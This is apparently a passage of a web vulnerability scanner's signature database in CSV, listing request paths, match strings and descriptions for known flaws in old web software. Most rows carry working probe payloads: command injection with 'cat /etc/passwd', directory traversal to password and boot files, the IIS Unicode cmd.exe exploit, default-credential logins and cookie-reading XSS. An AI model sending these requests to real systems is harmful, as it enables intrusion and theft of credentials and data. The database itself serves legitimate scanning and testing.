"003101","3567","7","/shop/member_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","",""
"003102","3567","7","/shop/member_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","",""
"003103","3568","7","@CGIDIRSsendform.cgi","GET","200","","","","","This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent. CVE-2002-0710. BID-5286.","",""
"003104","3569","7","/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/","GET","boot loader","","","","","Citrix CGI allows directory traversal.","",""
"003105","3570","2","/proxy/ssllogin?user=administrator&password=administrator","GET",">administrator<","","","","","Compaq Web-Based Management allows login with ID/pass 'administrator'/'administrator'.","",""
"003106","3570","2","/proxy/ssllogin?user=administrator&password=operator","GET",">operator<","","","","","Compaq Web-Based Management allows login with ID/pass 'operator'/'operator'.","",""
"003107","3570","2","/proxy/ssllogin?user=administrator&password=user","GET",">user<","","","","","Compaq Web-Based Management allows login with ID/pass 'user'/'user'.","",""
"003108","3587","7","@CGIDIRSFileSeek.cgi?head=&foot=;cat%20/etc/passwd","GET","root:","","","","","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com","",""
"003109","3587","7","@CGIDIRSFileSeek.cgi?head=;cat%20/etc/passwd|&foot=","GET","root:","","","","","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com","",""
"003110","3588","7","@CGIDIRSFileSeek2.cgi?head=&foot=;cat%20/etc/passwd","GET","root:","","","","","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com","",""
"003111","3588","7","@CGIDIRSFileSeek2.cgi?head=;cat%20/etc/passwd|&foot=","GET","root:","","","","","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com","",""
"003112","3589","7","@CGIDIRSFileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd","GET","root:","","","","","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com","",""
"003113","3589","7","@CGIDIRSFileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=","GET","root:","","","","","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com","",""
"003114","3590","7","@CGIDIRSFileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd","GET","root:","","","","","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com","",""
"003115","3590","7","@CGIDIRSFileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=","GET","root:","","","","","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com","",""
"003116","3591","b","/project/index.php?m=projects&user_cookie=1","GET","200","","","","","dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.","",""
"003117","3632","4","/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003118","3633","4","/webcalendar/week.php?user=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003119","369","3","/active.log","GET","WEBactive Http Server","","","","","The WebActive log is accessible remotely.","",""
"003120","3761","7","/?pattern=/etc/*&sort=name","GET","passwd","","hosts","","","The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.","",""
"003121","3761","7","/images/?pattern=/etc/*&sort=name","GET","passwd","","hosts","","","The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.","",""
"003122","3762","4","/debug/dbg?host==<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","",""
"003123","3762","4","/debug/echo?name=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","",""
"003124","3762","4","/debug/errorInfo?title===<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","",""
"003125","3762","4","/debug/showproc?proc===<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.","",""
"003126","379","8","/site/eg/source.asp","GET","200","","","","","This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CVE-2000-0628.","",""
"003127","3800","7","@PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","phpMyAdmin is vulnerable to a directory traversal attack.","",""
"003128","383","2","/~nobody/etc/passwd","GET","root:","","","","","Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf.","",""
"003129","3856","3","/admin/db.php","POST","e107 sql-dump","","","","","The e107 management system allows the remote SQL database to be dumped to the user, and it may contained hashed passwords. BID-8273.","dump_sql=foo",""
"003130","3856","3","/admin/db.php?dump_sql=1","GET","e107 sql-dump","","","","","e107 allows a dump of the MySQL database without authentication.","",""
"003131","3861","7","/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This install of DCForum allows attackers to read arbitrary files on the host.","",""
"003132","3861","7","@CGIDIRSdcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This install of DCForum allows attackers to read arbitrary files on the host.","",""
"003133","388","3","/%00/","GET","Directory listing of","","","","","Remote directories can be retrieved through Roxen, upgrade the server.","",""
"003134","4","6","/iissamples/exair/search/advsearch.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.","",""
"003135","4013","2bd","/isqlplus","GET","200","","","","","Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt","",""
"003136","4161","2","/data/member_log.txt","GET","200","","","","","Teekai's forum full 1.2 member's log can be retrieved remotely.","",""
"003137","4161","2","/data/userlog/log.txt","GET","200","","","","","Teekai's Tracking Online 1.0 log can be retrieved remotely.","",""
"003138","4161","2","/userlog.php","GET","200","","","","","Teekai's Tracking Online 1.0 log can be retrieved remotely.","",""
"003139","4164","7","/internal.sws?../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","",""
"003140","4164","7","/internal.sws?../../../../../../../../winnt/win.ini","GET","\[windows\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","",""
"003141","4165","7","/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini","GET","\[fonts\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","",""
"003142","4165","7","/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini","GET","\[windows\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","",""
"003143","4171","2","/ASP/cart/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","",""
"003144","4171","2","/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","",""
"003145","4171","2","/mcartfree/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","",""
"003146","4171","2","/metacart/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","",""
"003147","4171","2","/shop/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","",""
"003148","4171","2","/shoponline/fpdb/shop.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","",""
"003149","4171","2","/shopping/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","",""
"003150","4174","4","/search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","GET","<script>alert\(document\.cookie\)<\/script>","","","","","phPay v2.02 cross site scripting. http://phpay.sourceforge.net/.","",""
"003151","35877","3","/admin/phpinfo.php","GET","PHP Version","","","","","Immobilier allows phpinfo() to be run.","",""
"003152","4176","3","/start.php?config=alper.inc.php","GET","Failed opening required","","","","","phPay v2.02 information disclosure. http://phpay.sourceforge.net/.","",""
"003153","4177","3","/login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang","GET","Failed opening required","","","","","phPay v2.02 information disclosure. http://phpay.sourceforge.net/.","",""
"003154","4191","7","/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1","GET","root:","","","","","KorWebLog from http://weblog.kldp.org/ allows any file to be read on the system.","",""
"003155","4192","d","@CGIDIRSgettransbitmap","GET","200","","","","","Sun Answerbook2 is vulnerable to a buffer overflow in the gettransbitmap CGI. All default CGIs should be disabled or removed, and Answerbook2 should be disabled if not being used.","",""
"003156","4220","8","@CGIDIRSguestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|","GET","root:","","","","","cpanel's guestbook.cgi allows any command to be executed on the remote server. Remove /usr/local/cpanel/cgi-sys/guestbook.cgi or update to a new version of cpanel.","",""
"003157","4231","3","/JUNK(5).xml","GET","file:","","","","","Coccoon from Apache-XML project reveals file system path in error messages.","",""
"003158","4231","3","/JUNK(5)/","GET","FileNotFoundException: \/","","","","","Coccoon 2.1.4 from Apache-XML project reveals file system path in error messages.","",""
"003159","4233","1","/cgi-bin/main_menu.pl","GET","NetDetector Traffic Analysis","","","","","The NetDetector allows unauthenticated users to perform database queries.","",""
"003160","4237","2","/ban.bak","GET","200","","","","","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.","",""
"003161","4237","2","/ban.dat","GET","200","","","","","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.","",""
"003162","4237","2","/ban.log","GET","200","","","","","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.","",""
"003163","4237","2","/banmat.pwd","GET","200","","","","","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.","",""
"003164","4238","2","/admin/adminproc.asp","GET","200","","","","","Xpede administration page may be available. The /admin directory should be protected.","",""
"003165","4239","2","/admin/datasource.asp","GET","200","","","","","Xpede page reveals SQL account name. The /admin directory should be protected.","",""
"003166","4240","9","/utils/sprc.asp","GET","200","","","","","Xpede page may allow SQL injection.","",""
"003167","4241","2","/reports/temp/","GET","[Ii]ndex [Oo]f ","","","","","Xpede reports directory should not be browsable.","",""
"003168","4245","3","@CGIDIRSrtm.log","GET","HttpPost Retry","","","","","Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.","",""
"003169","4261","3","@CGIDIRSVsSetCookie.exe?","GET","200","","","","","A flaw in VsSetCookie.exe may allow attackers to guess a correct user name & gain access to the Lucent system.","",""
"003170","4262","4","/addressbook.php?\"><script>alert(Vulnerable)</script><!--","GET","<script>alert\(Vulnerable\)<\/script>","","","","","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003171","4263","4","/options.php?optpage=<script>alert('Vulnerable!')</script>","GET","include_path","","","","","This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.","",""
"003172","4264","4","/search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search","GET","include_path","","","","","This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.","",""
"003173","4265","4","/help.php?chapter=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003174","4266","4","/src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0","GET","<script>alert\(Vulnerable\)<\/script>","","","","","Squirrel Mail is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003175","4300","7","@CGIDIRSpowerup/r.cgi?FILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","The Powerup CGI allows attackers to read any file on the system.","",""
"003176","4300","7","@CGIDIRSr.cgi?FILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","The Powerup CGI allows attackers to read any file on the system.","",""
"003177","4301","d","@CGIDIRSWebnews.exe","GET","200","","","","","Some versions of WebNews are vulnerable to a buffer overflow. See http://www.nextgenss.com/advisories/netwinnews.txt for more info.","",""
"003178","4301","a","@CGIDIRSwebnews.pl","GET","200","","","","","WebNews may contain some default users in the binary: testweb/newstest, alwn3845/imaptest, alwi3845/wtest3452, testweb2/wtest4879","",""
"003179","4302","7","/.../.../.../","GET","Last Modified","","","","","The myCIO server allows directory traversal.","",""
"003180","4313","3","@CGIDIRStexis.exe/junk","GET","Web Script","","","","","Texis Web Script gives system path/information when an invalid file is requested.","",""
"003181","4313","3","@CGIDIRStexis/junk","GET","Web Script","","","","","Texis Web Script gives system path/information when an invalid file is requested.","",""
"003182","4314","3","/texis.exe/?-dump","GET","200","","","","","Texis installation may reveal sensitive information.","",""
"003183","4314","3","/texis.exe/?-version","GET","200","","","","","Texis installation may reveal sensitive information.","",""
"003184","435","7","@CGIDIRSapexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/","GET","root:","","","","","This allows attackers to read arbitrary files from the server. CVE-2000-0975. BID-2338.","",""
"003185","4356","4","/acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""
"003186","4357","4","/acart2_0/error.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""
"003187","4358","4","/acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""
"003188","4359","4","/acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""
"003189","436","7","@CGIDIRSsensepost.exe?/c+dir","GET","200","","","","","The presence of sensepost.exe indicates the system is/was vulnerable to a Unicode flaw and was compromised with a test script from SensePost. The sensepost.exe allows command execution (it is a copy of cmd.exe), as did the original unicode exploit (see ht","",""
"003190","436","8","/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003191","436","8","/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003192","436","8","/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003193","436","8","/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003194","436","8","/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003195","436","8","/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003196","436","8","/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003197","436","8","/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003198","436","8","/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"","GET","boot\.ini","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003199","436","8","/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""
"003200","4360","2","/acart2_0/acart2_0.mdb","GET","200","","","","","Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.","",""
"003201","4361","2","/acart2_0/admin/category.asp","GET","200","","","","","Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.","",""
"003202","474","7","/Sites/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
"003203","474","7","/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
"003204","474","7","/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
"003205","474","7","/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
"003206","474","7","/Sites/Samples/Knowledge/Push/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
"003207","474","7","/Sites/Samples/Knowledge/Search/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
"003208","474","7","/SiteServer/Publishing/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
"003209","17671","37","/siteserver/publishing/viewcode.asp?source=/default.asp","GET","200","","","","","May be able to view source code using Site Server vulnerability.","",""
"003210","4775","7","/shoutbox.php?conf=../../../../../../../etc/passwd","GET","root:","","","","","Webfroot Shoutbox 2.32 and below allows any file to be read from the system.","",""
"003211","4908","d","/securelogin/1,2345,A,00.html","GET","200","","","","","Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.","",""
"003212","4927","7","/.%252e/.%252e/.%252e/winnt/boot.ini","GET","boot loader","","","","","JWalk Web server allows any file to be retrieved from the remote system.","",""
"003213","4928","3","/add.php","GET","Failed opening '","","","","","Ultimate PHP Board (UPB) final beta 1.0 reveals file system paths in add.php error messages.","",""
"003214","497","3","/class/mysql.class","GET","This program is free software","","","","","Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials.","",""
"003215","497","3","/inc/sendmail.inc","GET","This program is free software","","","","","Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials.","",""
"003216","5089","8","/admin/system.php3?cmd=cat%20/etc/passwd","GET","root:","","","","","DotBr 0.1 allows remote command execution.","",""
"003217","5089","8","/admin/system.php3?cmd=dir%20c:\\","GET","boot\.ini","","","","","DotBr 0.1 allows remote command execution.","",""
"003218","5090","8","/admin/exec.php3?cmd=cat%20/etc/passwd","GET","root:","","","","","DotBr 0.1 allows remote command execution.","",""
"003219","5090","8","/admin/exec.php3?cmd=dir%20c:\\","GET","boot\.ini","","","","","DotBr 0.1 allows remote command execution.","",""
"003220","5091","3","/foo.php3","GET","PHP Version","","","","","DotBr 0.1 has a phpinfo() script called foo.php3.","",""
"003221","5092","3","/config.inc","GET","200","","","","","DotBr 0.1 configuration file includes usernames and passwords.","",""
"003222","5093","3","@CGIDIRSenviron.pl","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
"003223","5094","3","@CGIDIRStestcgi.exe","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
"003224","5095","3","/sysuser/docmgr/ieedit.stm?url=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
"003225","5096","3","/sysuser/docmgr/iecreate.stm?template=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
"003226","5097","4","/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003227","5098","4","/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003228","5098","4","/sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003229","5098","4","/sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003230","5098","4","/sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003231","5098","4","/sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003232","5098","4","/sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003233","5098","4","/sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003234","5098","4","/sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003235","5098","4","/sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003236","5098","4","/sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003237","5098","4","/sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003238","5098","4","/sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003239","5098","4","/sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003240","5098","4","/sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003241","5098","4","/sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003242","5098","4","/sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003243","5099","4","/sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003244","5099","4","/sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003245","5099","4","/sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003246","5099","4","/sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003247","5099","4","/sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003248","5099","4","/sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003249","5099","4","/sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003250","5099","4","/sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003251","5099","4","/sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003252","5100","4","@CGIDIRStestcgi.exe?<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003253","5101","4","@CGIDIRSenviron.pl?param1=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003254","5102","4","/syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003255","5102","4","/syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","&bar=456",""
"003256","5103","4","/syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003257","5104","4","/syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003258","5105","4","/syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003259","5106","4","/netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003260","5107","4","/netutils/findata.stm?host=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003261","5107","4","/netutils/findata.stm?user=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
